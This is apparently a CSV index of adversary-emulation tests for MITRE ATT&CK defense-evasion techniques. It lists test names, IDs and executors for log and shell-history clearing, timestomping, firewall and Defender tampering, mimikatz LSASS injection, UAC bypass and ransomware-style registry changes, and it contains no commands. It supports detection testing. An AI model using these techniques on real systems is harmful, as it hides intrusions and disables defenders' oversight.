defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,3,Detect Virtualization Environment (MacOS),a960185f-aef6-4547-8350-d1ce16680d09,sh
defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,4,Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows),4a41089a-48e0-47aa-82cb-5b81a463bc78,powershell
defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,1,rm -rf,989cc1b1-3642-4260-a809-54f9dd559683,sh
defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,2,Delete log files using built-in log utility,653d39cd-bae7-499a-898c-9fb96b8b5cd1,sh
defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,3,Truncate system log files via truncate utility,6290f8a8-8ee9-4661-b9cf-390031bf6973,sh
defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,4,Delete log files via cat utility by appending /dev/null or /dev/zero,c23bdb88-928d-493e-b46d-df2906a50941,sh
defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,5,System log file deletion via find utility,bc8eeb4a-cc3e-45ec-aa6e-41e973da2558,sh
defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,6,Overwrite macOS system log via echo utility,0208ea60-98f1-4e8c-8052-930dce8f742c,sh
defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,7,Real-time system log clearance/deletion,848e43b3-4c0a-4e4c-b4c9-d1e8cea9651c,sh
defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,8,Delete system log files via unlink utility,03013b4b-01db-437d-909b-1fdaa5010ee8,sh
defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,9,Delete system log files using shred utility,86f0e4d5-3ca7-45fb-829d-4eda32b232bb,sh
defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,10,Delete system log files using srm utility,b0768a5e-0f32-4e75-ae5b-d036edcf96b6,sh
defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,11,Delete system log files using OSAScript,810a465f-cd4f-47bc-b43e-d2de3b033ecc,sh
defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,12,Delete system log files using Applescript,e62f8694-cbc7-468f-862c-b10cd07e1757,sh
defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,13,Delete system journal logs via rm and journalctl utilities,ca50dd85-81ff-48ca-92e1-61f119cb1dcf,sh
defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,14,Overwrite Linux Mail Spool,1602ff76-ed7f-4c94-b550-2f727b4782d4,bash
defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,15,Overwrite Linux Log,d304b2dc-90b4-4465-a650-16ddd503f7b5,bash
defense-evasion,T1218.004,Signed Binary Proxy Execution: InstallUtil,1,CheckIfInstallable method call,ffd9c807-d402-47d2-879d-f915cf2a3a94,powershell
defense-evasion,T1218.004,Signed Binary Proxy Execution: InstallUtil,2,InstallHelper method call,d43a5bde-ae28-4c55-a850-3f4c80573503,powershell
defense-evasion,T1218.004,Signed Binary Proxy Execution: InstallUtil,3,InstallUtil class constructor method call,9b7a7cfc-dd2e-43f5-a885-c0a3c270dd93,powershell
defense-evasion,T1218.004,Signed Binary Proxy Execution: InstallUtil,4,InstallUtil Install method call,9f9968a6-601a-46ca-b7b7-6d4fe0f98f0b,powershell
defense-evasion,T1218.004,Signed Binary Proxy Execution: InstallUtil,5,InstallUtil Uninstall method call - /U variant,34428cfa-8e38-41e5-aff4-9e1f8f3a7b4b,powershell
defense-evasion,T1218.004,Signed Binary Proxy Execution: InstallUtil,6,InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant,06d9deba-f732-48a8-af8e-bdd6e4d98c1d,powershell
defense-evasion,T1218.004,Signed Binary Proxy Execution: InstallUtil,7,InstallUtil HelpText method call,5a683850-1145-4326-a0e5-e91ced3c6022,powershell
defense-evasion,T1218.004,Signed Binary Proxy Execution: InstallUtil,8,InstallUtil evasive invocation,559e6d06-bb42-4307-bff7-3b95a8254bad,powershell
defense-evasion,T1574.001,Hijack Execution Flow: DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
defense-evasion,T1553.001,Subvert Trust Controls: Gatekeeper Bypass,1,Gatekeeper Bypass,fb3d46c6-9480-4803-8d7d-ce676e1f1a9b,sh
defense-evasion,T1222.001,File and Directory Permissions Modification: Windows File and Directory Permissions Modification,1,Take ownership using takeown utility,98d34bb4-6e75-42ad-9c41-1dae7dc6a001,command_prompt
defense-evasion,T1222.001,File and Directory Permissions Modification: Windows File and Directory Permissions Modification,2,cacls - Grant permission to specified user or group recursively,a8206bcc-f282-40a9-a389-05d9c0263485,command_prompt
defense-evasion,T1222.001,File and Directory Permissions Modification: Windows File and Directory Permissions Modification,3,attrib - Remove read-only attribute,bec1e95c-83aa-492e-ab77-60c71bbd21b0,command_prompt
defense-evasion,T1222.001,File and Directory Permissions Modification: Windows File and Directory Permissions Modification,4,attrib - hide file,32b979da-7b68-42c9-9a99-0e39900fc36c,command_prompt
defense-evasion,T1222.001,File and Directory Permissions Modification: Windows File and Directory Permissions Modification,5,Grant Full Access to folder for Everyone - Ryuk Ransomware Style,ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6,command_prompt
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,1,Msiexec.exe - Execute Local MSI file with embedded JScript,a059b6c4-e7d6-4b2e-bcd7-9b2b33191a04,command_prompt
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,2,Msiexec.exe - Execute Local MSI file with embedded VBScript,8d73c7b0-c2b1-4ac1-881a-4aa644f76064,command_prompt
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,3,Msiexec.exe - Execute Local MSI file with an embedded DLL,628fa796-76c5-44c3-93aa-b9d8214fd568,command_prompt
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,4,Msiexec.exe - Execute Local MSI file with an embedded EXE,ed3fa08a-ca18-4009-973e-03d13014d0e8,command_prompt
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,5,WMI Win32_Product Class - Execute Local MSI file with embedded JScript,882082f0-27c6-4eec-a43c-9aa80bccdb30,powershell
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,6,WMI Win32_Product Class - Execute Local MSI file with embedded VBScript,cf470d9a-58e7-43e5-b0d2-805dffc05576,powershell
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,7,WMI Win32_Product Class - Execute Local MSI file with an embedded DLL,32eb3861-30da-4993-897a-42737152f5f8,powershell
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,8,WMI Win32_Product Class - Execute Local MSI file with an embedded EXE,55080eb0-49ae-4f55-a440-4167b7974f79,powershell
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,9,Msiexec.exe - Execute the DllRegisterServer function of a DLL,0106ffa5-fab6-4c7d-82e3-e6b8867d5e5d,command_prompt
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,10,Msiexec.exe - Execute the DllUnregisterServer function of a DLL,ab09ec85-4955-4f9c-b8e0-6851baf4d47f,command_prompt
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,11,Msiexec.exe - Execute Remote MSI file,44a4bedf-ffe3-452e-bee4-6925ab125662,command_prompt
defense-evasion,T1556.002,Modify Authentication Process: Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,1,Clear Bash history (rm),a934276e-2be5-4a36-93fd-98adbb5bd4fc,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,2,Clear Bash history (echo),cbf506a5-dd78-43e5-be7e-a46b7c7a0a11,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,3,Clear Bash history (cat dev/null),b1251c35-dcd3-4ea1-86da-36d27b54f31f,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,4,Clear Bash history (ln dev/null),23d348f3-cc5c-4ba9-bd0a-ae09069f0914,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,5,Clear Bash history (truncate),47966a1d-df4f-4078-af65-db6d9aa20739,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,6,Clear history of a bunch of shells,7e6721df-5f08-4370-9255-f06d8a77af4c,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,7,Clear and Disable Bash History Logging,784e4011-bd1a-4ecd-a63a-8feb278512e6,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,8,Use Space Before Command to Avoid Logging to History,53b03a54-4529-4992-852d-a00b4b7215a6,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,9,Disable Bash History Logging with SSH -T,5f8abd62-f615-43c5-b6be-f780f25790a1,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,10,Prevent Powershell History Logging,2f898b81-3e97-4abb-bc3f-a95138988370,powershell
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,11,Clear Powershell History by Deleting History File,da75ae8d-26d6-4483-b0fe-700e4df4f037,powershell
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,12,Set Custom AddToHistoryHandler to Avoid History File Logging,1d0d9aa6-6111-4f89-927b-53e8afae7f94,powershell
defense-evasion,T1202,Indirect Command Execution,1,Indirect Command Execution - pcalua.exe,cecfea7a-5f03-4cdd-8bc8-6f7c22862440,command_prompt
defense-evasion,T1202,Indirect Command Execution,2,Indirect Command Execution - forfiles.exe,8b34a448-40d9-4fc3-a8c8-4bb286faf7dc,command_prompt
defense-evasion,T1202,Indirect Command Execution,3,Indirect Command Execution - conhost.exe,cf3391e0-b482-4b02-87fc-ca8362269b29,command_prompt
defense-evasion,T1140,Deobfuscate/Decode Files or Information,1,Deobfuscate/Decode Files Or Information,dc6fe391-69e6-4506-bd06-ea5eeb4082f8,command_prompt
defense-evasion,T1140,Deobfuscate/Decode Files or Information,2,Certutil Rename and Decode,71abc534-3c05-4d0c-80f7-cbe93cb2aa94,command_prompt
defense-evasion,T1140,Deobfuscate/Decode Files or Information,3,Base64 decoding with Python,356dc0e8-684f-4428-bb94-9313998ad608,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,4,Base64 decoding with Perl,6604d964-b9f6-4d4b-8ce8-499829a14d0a,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,5,Base64 decoding with shell utilities,b4f6a567-a27a-41e5-b8ef-ac4b4008bb7e,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,6,Hex decoding with shell utilities,005943f9-8dd5-4349-8b46-0313c0a9f973,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,7,Linux Base64 Encoded Shebang in CLI,3a15c372-67c1-4430-ac8e-ec06d641ce4d,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,8,XOR decoding and command execution using Python,c3b65cd5-ee51-4e98-b6a3-6cbdec138efc,bash
defense-evasion,T1562,Impair Defenses,1,Windows Disable LSA Protection,40075d5f-3a70-4c66-9125-f72bee87247d,command_prompt
defense-evasion,T1562,Impair Defenses,2,Disable journal logging via systemctl utility,c3a377f9-1203-4454-aa35-9d391d34768f,sh
defense-evasion,T1562,Impair Defenses,3,Disable journal logging via sed utility,12e5551c-8d5c-408e-b3e4-63f53b03379f,sh
defense-evasion,T1055.003,Thread Execution Hijacking,1,Thread Execution Hijacking,578025d5-faa9-4f6d-8390-aae527d503e1,powershell
defense-evasion,T1036,Masquerading,1,System File Copied to Unusual Location,51005ac7-52e2-45e0-bdab-d17c6d4916cd,powershell
defense-evasion,T1036,Masquerading,2,Malware Masquerading and Execution from Zip File,4449c89b-ec82-43a4-89c1-91e2f1abeecc,powershell
defense-evasion,T1070.008,Email Collection: Mailbox Manipulation,1,Copy and Delete Mailbox Data on Windows,d29f01ea-ac72-4efc-8a15-bea64b77fabf,powershell
defense-evasion,T1070.008,Email Collection: Mailbox Manipulation,2,Copy and Delete Mailbox Data on Linux,25e2be0e-96f7-4417-bd16-a4a2500e3802,bash
defense-evasion,T1070.008,Email Collection: Mailbox Manipulation,3,Copy and Delete Mailbox Data on macOS,3824130e-a6e4-4528-8091-3a52eeb540f6,bash
defense-evasion,T1070.008,Email Collection: Mailbox Manipulation,4,Copy and Modify Mailbox Data on Windows,edddff85-fee0-499d-9501-7d4d2892e79b,powershell
defense-evasion,T1070.008,Email Collection: Mailbox Manipulation,5,Copy and Modify Mailbox Data on Linux,6d99f93c-da56-49e3-b195-163090ace4f6,bash
defense-evasion,T1070.008,Email Collection: Mailbox Manipulation,6,Copy and Modify Mailbox Data on macOS,8a0b1579-5a36-483a-9cde-0236983e1665,bash
defense-evasion,T1055,Process Injection,1,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell
defense-evasion,T1055,Process Injection,2,Remote Process Injection in LSASS via mimikatz,3203ad24-168e-4bec-be36-f79b13ef8a83,command_prompt
defense-evasion,T1055,Process Injection,3,Section View Injection,c6952f41-6cf0-450a-b352-2ca8dae7c178,powershell
defense-evasion,T1218,Signed Binary Proxy Execution,1,mavinject - Inject DLL into running process,c426dacf-575d-4937-8611-a148a86a5e61,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,2,Register-CimProvider - Execute evil dll,ad2c17ed-f626-4061-b21e-b9804a6f3655,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,3,InfDefaultInstall.exe .inf Execution,54ad7d5a-a1b5-472c-b6c4-f8090fb2daef,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,4,ProtocolHandler.exe Downloaded a Suspicious File,db020456-125b-4c8b-a4a7-487df8afb5a2,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,5,Microsoft.Workflow.Compiler.exe Payload Execution,7cbb0f26-a4c1-4f77-b180-a009aa05637e,powershell
defense-evasion,T1218,Signed Binary Proxy Execution,6,Renamed Microsoft.Workflow.Compiler.exe Payload Executions,4cc40fd7-87b8-4b16-b2d7-57534b86b911,powershell
defense-evasion,T1218,Signed Binary Proxy Execution,7,Invoke-ATHRemoteFXvGPUDisablementCommand base test,9ebe7901-7edf-45c0-b5c7-8366300919db,powershell
defense-evasion,T1218,Signed Binary Proxy Execution,8,DiskShadow Command Execution,0e1483ba-8f0c-425d-b8c6-42736e058eaa,powershell
defense-evasion,T1218,Signed Binary Proxy Execution,9,Load Arbitrary DLL via Wuauclt (Windows Update Client),49fbd548-49e9-4bb7-94a6-3769613912b8,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,10,Lolbin Gpscript logon option,5bcda9cd-8e85-48fa-861d-b5a85d91d48c,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,11,Lolbin Gpscript startup option,f8da74bb-21b8-4af9-8d84-f2c8e4a220e3,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,12,Lolbas ie4uinit.exe use as proxy,13c0804e-615e-43ad-b223-2dfbacd0b0b3,command_prompt
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,1,Set a file's access timestamp,5f9113d5-ed75-47ed-ba23-ea3573d05810,sh
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,2,Set a file's modification timestamp,20ef1523-8758-4898-b5a2-d026cc3d2c52,sh
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,3,Set a file's creation timestamp,8164a4a6-f99c-4661-ac4f-80f5e4e78d2b,sh
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,4,Modify file timestamps using reference file,631ea661-d661-44b0-abdb-7a7f3fc08e50,sh
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,5,Windows - Modify file creation timestamp with PowerShell,b3b2c408-2ff0-4a33-b89b-1cb46a9e6a9c,powershell
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,6,Windows - Modify file last modified timestamp with PowerShell,f8f6634d-93e1-4238-8510-f8a90a20dcf2,powershell
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,7,Windows - Modify file last access timestamp with PowerShell,da627f63-b9bd-4431-b6f8-c5b44d061a62,powershell
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,8,Windows - Timestomp a File,d7512c33-3a75-4806-9893-69abc3ccdd43,powershell
defense-evasion,T1620,Reflective Code Loading,1,WinPwn - Reflectively load Mimik@tz into memory,56b9589c-9170-4682-8c3d-33b86ecb5119,powershell
defense-evasion,T1218.003,Signed Binary Proxy Execution: CMSTP,1,CMSTP Executing Remote Scriptlet,34e63321-9683-496b-bbc1-7566bc55e624,command_prompt
defense-evasion,T1218.003,Signed Binary Proxy Execution: CMSTP,2,CMSTP Executing UAC Bypass,748cb4f6-2fb3-4e97-b7ad-b22635a09ab0,command_prompt
defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,1,Disable Windows IIS HTTP Logging,69435dcf-c66f-4ec0-a8b1-82beb76b34db,powershell
defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,2,Disable Windows IIS HTTP Logging via PowerShell,a957fb0f-1e85-49b2-a211-413366784b1e,powershell
defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,3,Kill Event Log Service Threads,41ac52ba-5d5e-40c0-b267-573ed90489bd,powershell
defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,4,Impair Windows Audit Log Policy,5102a3a7-e2d7-4129-9e45-f483f2e0eea8,command_prompt
defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,5,Clear Windows Audit Policy Config,913c0e4e-4b37-4b78-ad0b-90e7b25010f6,command_prompt
defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,6,Disable Event Logging with wevtutil,b26a3340-dad7-4360-9176-706269c74103,command_prompt
defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,7,Makes Eventlog blind with Phant0m,3ddf3d03-f5d6-462a-ad76-2c5ff7b6d741,command_prompt
defense-evasion,T1218.002,Signed Binary Proxy Execution: Control Panel,1,Control Panel Items,037e9d8a-9e46-4255-8b33-2ae3b545ca6f,command_prompt
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,1,Disable Microsoft Defender Firewall,88d05800-a5e4-407e-9b53-ece4174f197f,command_prompt
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,2,Disable Microsoft Defender Firewall via Registry,afedc8c4-038c-4d82-b3e5-623a95f8a612,command_prompt
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,3,Allow SMB and RDP on Microsoft Defender Firewall,d9841bf8-f161-4c73-81e9-fd773a5ff8c1,command_prompt
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,4,Opening ports for proxy - HARDRAIN,15e57006-79dd-46df-9bf9-31bc24fb5a80,command_prompt
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,5,Open a local port through Windows Firewall to any profile,9636dd6e-7599-40d2-8eee-ac16434f35ed,powershell
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,6,Allow Executable Through Firewall Located in Non-Standard Location,6f5822d2-d38d-4f48-9bfc-916607ff6b8c,powershell
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,7,Stop/Start UFW firewall,fe135572-edcd-49a2-afe6-1d39521c5a9a,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,8,Stop/Start UFW firewall systemctl,9fd99609-1854-4f3c-b47b-97d9a5972bd1,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,9,Turn off UFW logging,8a95b832-2c2a-494d-9cb0-dc9dd97c8bad,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,10,Add and delete UFW firewall rules,b2563a4e-c4b8-429c-8d47-d5bcb227ba7a,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,11,Edit UFW firewall user.rules file,beaf815a-c883-4194-97e9-fdbbb2bbdd7c,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,12,Edit UFW firewall ufw.conf file,c1d8c4eb-88da-4927-ae97-c7c25893803b,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,13,Edit UFW firewall sysctl.conf file,c4ae0701-88d3-4cd8-8bce-4801ed9f97e4,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,14,Edit UFW firewall main configuration file,7b697ece-8270-46b5-bbc7-6b9e27081831,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,15,Tail the UFW firewall log file,419cca0c-fa52-4572-b0d7-bc7c6f388a27,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,16,Disable iptables,7784c64e-ed0b-4b65-bf63-c86db229fd56,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,17,Modify/delete iptables firewall rules,899a7fb5-d197-4951-8614-f19ac4a73ad4,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,18,LockBit Black - Unusual Windows firewall registry modification -cmd,a4651931-ebbb-4cde-9363-ddf3d66214cb,command_prompt
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,19,LockBit Black - Unusual Windows firewall registry modification -Powershell,80b453d1-eec5-4144-bf08-613a6c3ffe12,powershell
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,20,Blackbit - Disable Windows Firewall using netsh firewall,91f348e6-3760-4997-a93b-2ceee7f254ee,command_prompt
defense-evasion,T1207,Rogue Domain Controller,1,DCShadow (Active Directory),0f4c5eb0-98a0-4496-9c3d-656b4f2bc8f6,powershell
defense-evasion,T1610,Deploy a container,1,Deploy Docker container,59aa6f26-7620-417e-9318-589e0fb7a372,bash
defense-evasion,T1112,Modify Registry,1,Modify Registry of Current User Profile - cmd,1324796b-d0f6-455a-b4ae-21ffee6aa6b9,command_prompt
defense-evasion,T1112,Modify Registry,2,Modify Registry of Local Machine - cmd,282f929a-6bc5-42b8-bd93-960c3ba35afe,command_prompt
defense-evasion,T1112,Modify Registry,3,Modify registry to store logon credentials,c0413fb5-33e2-40b7-9b6f-60b29f4a7a18,command_prompt
defense-evasion,T1112,Modify Registry,4,Add domain to Trusted sites Zone,cf447677-5a4e-4937-a82c-e47d254afd57,powershell
defense-evasion,T1112,Modify Registry,5,Javascript in registry,15f44ea9-4571-4837-be9e-802431a7bfae,powershell
defense-evasion,T1112,Modify Registry,6,Change Powershell Execution Policy to Bypass,f3a6cceb-06c9-48e5-8df8-8867a6814245,powershell
defense-evasion,T1112,Modify Registry,7,BlackByte Ransomware Registry Changes - CMD,4f4e2f9f-6209-4fcf-9b15-3b7455706f5b,command_prompt
defense-evasion,T1112,Modify Registry,8,BlackByte Ransomware Registry Changes - Powershell,0b79c06f-c788-44a2-8630-d69051f1123d,powershell
defense-evasion,T1112,Modify Registry,9,Disable Windows Registry Tool,ac34b0f7-0f85-4ac0-b93e-3ced2bc69bb8,command_prompt
defense-evasion,T1112,Modify Registry,10,Disable Windows CMD application,d2561a6d-72bd-408c-b150-13efe1801c2a,powershell
defense-evasion,T1112,Modify Registry,11,Disable Windows Task Manager application,af254e70-dd0e-4de6-9afe-a994d9ea8b62,command_prompt
defense-evasion,T1112,Modify Registry,12,Disable Windows Notification Center,c0d6d67f-1f63-42cc-95c0-5fd6b20082ad,command_prompt
defense-evasion,T1112,Modify Registry,13,Disable Windows Shutdown Button,6e0d1131-2d7e-4905-8ca5-d6172f05d03d,command_prompt
defense-evasion,T1112,Modify Registry,14,Disable Windows LogOff Button,e246578a-c24d-46a7-9237-0213ff86fb0c,command_prompt
defense-evasion,T1112,Modify Registry,15,Disable Windows Change Password Feature,d4a6da40-618f-454d-9a9e-26af552aaeb0,command_prompt
defense-evasion,T1112,Modify Registry,16,Disable Windows Lock Workstation Feature,3dacb0d2-46ee-4c27-ac1b-f9886bf91a56,command_prompt
defense-evasion,T1112,Modify Registry,17,Activate Windows NoDesktop Group Policy Feature,93386d41-525c-4a1b-8235-134a628dee17,command_prompt
defense-evasion,T1112,Modify Registry,18,Activate Windows NoRun Group Policy Feature,d49ff3cc-8168-4123-b5b3-f057d9abbd55,command_prompt
defense-evasion,T1112,Modify Registry,19,Activate Windows NoFind Group Policy Feature,ffbb407e-7f1d-4c95-b22e-548169db1fbd,command_prompt
defense-evasion,T1112,Modify Registry,20,Activate Windows NoControlPanel Group Policy Feature,a450e469-ba54-4de1-9deb-9023a6111690,command_prompt
defense-evasion,T1112,Modify Registry,21,Activate Windows NoFileMenu Group Policy Feature,5e27bdb4-7fd9-455d-a2b5-4b4b22c9dea4,command_prompt
defense-evasion,T1112,Modify Registry,22,Activate Windows NoClose Group Policy Feature,12f50e15-dbc6-478b-a801-a746e8ba1723,command_prompt
defense-evasion,T1112,Modify Registry,23,Activate Windows NoSetTaskbar Group Policy Feature,d29b7faf-7355-4036-9ed3-719bd17951ed,command_prompt
defense-evasion,T1112,Modify Registry,24,Activate Windows NoTrayContextMenu Group Policy Feature,4d72d4b1-fa7b-4374-b423-0fe326da49d2,command_prompt
defense-evasion,T1112,Modify Registry,25,Activate Windows NoPropertiesMyDocuments Group Policy Feature,20fc9daa-bd48-4325-9aff-81b967a84b1d,command_prompt
defense-evasion,T1112,Modify Registry,26,Hide Windows Clock Group Policy Feature,8023db1e-ad06-4966-934b-b6a0ae52689e,command_prompt
defense-evasion,T1112,Modify Registry,27,Windows HideSCAHealth Group Policy Feature,a4637291-40b1-4a96-8c82-b28f1d73e54e,command_prompt
defense-evasion,T1112,Modify Registry,28,Windows HideSCANetwork Group Policy Feature,3e757ce7-eca0-411a-9583-1c33b8508d52,command_prompt
defense-evasion,T1112,Modify Registry,29,Windows HideSCAPower Group Policy Feature,8d85a5d8-702f-436f-bc78-fcd9119496fc,command_prompt
defense-evasion,T1112,Modify Registry,30,Windows HideSCAVolume Group Policy Feature,7f037590-b4c6-4f13-b3cc-e424c5ab8ade,command_prompt
defense-evasion,T1112,Modify Registry,31,Windows Modify Show Compress Color And Info Tip Registry,795d3248-0394-4d4d-8e86-4e8df2a2693f,command_prompt
defense-evasion,T1112,Modify Registry,32,Windows Powershell Logging Disabled,95b25212-91a7-42ff-9613-124aca6845a8,command_prompt
defense-evasion,T1112,Modify Registry,33,Windows Add Registry Value to Load Service in Safe Mode without Network,1dd59fb3-1cb3-4828-805d-cf80b4c3bbb5,command_prompt
defense-evasion,T1112,Modify Registry,34,Windows Add Registry Value to Load Service in Safe Mode with Network,c173c948-65e5-499c-afbe-433722ed5bd4,command_prompt
defense-evasion,T1112,Modify Registry,35,Disable Windows Toast Notifications,003f466a-6010-4b15-803a-cbb478a314d7,command_prompt
defense-evasion,T1112,Modify Registry,36,Disable Windows Security Center Notifications,45914594-8df6-4ea9-b3cc-7eb9321a807e,command_prompt
defense-evasion,T1112,Modify Registry,37,Suppress Win Defender Notifications,c30dada3-7777-4590-b970-dc890b8cf113,command_prompt
defense-evasion,T1112,Modify Registry,38,Allow RDP Remote Assistance Feature,86677d0e-0b5e-4a2b-b302-454175f9aa9e,command_prompt
defense-evasion,T1112,Modify Registry,39,NetWire RAT Registry Key Creation,65704cd4-6e36-4b90-b6c1-dc29a82c8e56,command_prompt
defense-evasion,T1112,Modify Registry,40,Ursnif Malware Registry Key Creation,c375558d-7c25-45e9-bd64-7b23a97c1db0,command_prompt
defense-evasion,T1112,Modify Registry,41,Terminal Server Client Connection History Cleared,3448824b-3c35-4a9e-a8f5-f887f68bea21,command_prompt
defense-evasion,T1112,Modify Registry,42,Disable Windows Error Reporting Settings,d2c9e41e-cd86-473d-980d-b6403562e3e1,command_prompt
defense-evasion,T1112,Modify Registry,43,DisallowRun Execution Of Certain Applications,71db768a-5a9c-4047-b5e7-59e01f188e84,command_prompt
defense-evasion,T1112,Modify Registry,44,Enabling Restricted Admin Mode via Command_Prompt,fe7974e5-5813-477b-a7bd-311d4f535e83,command_prompt
defense-evasion,T1112,Modify Registry,45,Mimic Ransomware - Enable Multiple User Sessions,39f1f378-ba8a-42b3-96dc-2a6540cfc1e3,command_prompt
defense-evasion,T1112,Modify Registry,46,Mimic Ransomware - Allow Multiple RDP Sessions per User,35727d9e-7a7f-4d0c-a259-dc3906d6e8b9,command_prompt
defense-evasion,T1112,Modify Registry,47,Event Viewer Registry Modification - Redirection URL,6174be7f-5153-4afd-92c5-e0c3b7cdb5ae,command_prompt
defense-evasion,T1112,Modify Registry,48,Event Viewer Registry Modification - Redirection Program,81483501-b8a5-4225-8b32-52128e2f69db,command_prompt
defense-evasion,T1112,Modify Registry,49,Enabling Remote Desktop Protocol via Remote Registry,e3ad8e83-3089-49ff-817f-e52f8c948090,command_prompt
defense-evasion,T1112,Modify Registry,50,Disable Win Defender Notification,12e03af7-79f9-4f95-af48-d3f12f28a260,command_prompt
defense-evasion,T1112,Modify Registry,51,Disable Windows OS Auto Update,01b20ca8-c7a3-4d86-af59-059f15ed5474,command_prompt
defense-evasion,T1112,Modify Registry,52,Disable Windows Auto Reboot for current logon user,396f997b-c5f8-4a96-bb2c-3c8795cf459d,command_prompt
defense-evasion,T1112,Modify Registry,53,Windows Auto Update Option to Notify before download,335a6b15-b8d2-4a3f-a973-ad69aa2620d7,command_prompt
defense-evasion,T1112,Modify Registry,54,Do Not Connect To Win Update,d1de3767-99c2-4c6c-8c5a-4ba4586474c8,command_prompt
defense-evasion,T1112,Modify Registry,55,Tamper Win Defender Protection,3b625eaa-c10d-4635-af96-3eae7d2a2f3c,command_prompt
